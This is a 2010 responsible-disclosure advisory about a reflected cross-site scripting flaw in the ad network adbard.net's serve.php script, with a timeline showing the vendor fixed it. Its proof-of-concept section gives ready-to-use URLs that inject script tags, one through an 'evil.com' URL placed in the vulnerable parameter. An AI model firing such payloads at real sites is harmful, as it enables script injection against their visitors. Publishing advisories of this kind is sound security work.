Wednesday, August 25, 2010

Ad Bard Network(adbard.net) - network-wide Cross Site Scripting Vulnerability

1. OVERVIEW

A famous advertising network for free/open-source software community, adbard.net, is currently vulnerable to
Ad network-wide Cross Site Scripting vulnerability. All its advertising networks
(http://adbard.net/adbard/websites) are vulnerable subsequently. Though the vulnerability is not tied to
ad network sites, how it can be leveraged depends only on skills and well-thought plans of attackers.


2. SITE SERVICE DESCRIPTION

The Ad Bard Network is the only advertising network designed specifically for reaching the developers,
architects, users and influencers in the free software community, allowing advertisers to directly
communicate with the key customers in this exciting new area.


3. VULNERABILITY DESCRIPTION

The serve.php at adbard.net is vulnerable to Cross Site Scripting vulnerability as the "u" parameter
is not properly sanitized. The serve.php is linked from Adbard.net's ad script
(currently, it is 'http://cdn1.adbard.net/js/ab1.js').


4. PROOF-OF-CONCEPT/EXPLOIT

+ Cross Site Scripting  (OWASP 2010 Top 10 - A2)

http://adbard.net/?xss=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E

http://adbard.net/sites/default/modules/ad/serve.php?k=22e342dc6a6a99267a46f18fc5dcecf1&ab_s=18f5d31e3e39e9d3c8d5b850e79d4848&u=http://evil.com?x=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E&db=sakila&ab_c=103ffd7e-1ec7-b12d-d12a5ee2a828&r=

http://yehg.net/lab/pr0js/advisories/sites/adbard.net/xss/xss_adbard.net-serve.php(u).jpg
http://yehg.net/lab/pr0js/advisories/sites/adbard.net/xss/xss_adbard.net.jpg
http://yehg.net/lab/pr0js/advisories/sites/adbard.net/xss/xss_hackingexpose.blogspot.com.jpg
http://yehg.net/lab/pr0js/advisories/sites/adbard.net/xss/xss_coders.es.jpg
http://yehg.net/lab/pr0js/advisories/sites/adbard.net/xss/xss_wiki.phpmyadmin.net.jpg
http://yehg.net/lab/pr0js/advisories/sites/adbard.net/xss/xss_clamwin.com.jpg


5. IMPACT

As the adbard.net has tons of ad publishers and advertisers, attackers can exploit this flaw for fun and profit.


6. VENDOR

Ad Bard Network
- http://adbard.net


7. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


8. DISCLOSURE TIME-LINE

08-10-2010: vulnerability discovered
08-13-2010: contacted adbard.net and its owner Tag1 consulting via their support email
08-17-2010: got reply that adbard.net's engineers were looking at the issue
08-18-2010: vulnerablity fixed
08-18-2010: still vulnerable to attribute-based XSS
08-18-2010: notified again
08-20-2010: vulnerablity fixed


9. REFERENCES

Original Advisory URL: http://yehg.net/lab/pr0js/view.php/[adbard.net]_xss
OWASP Top 10 - http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

#yehg [08-20-2010]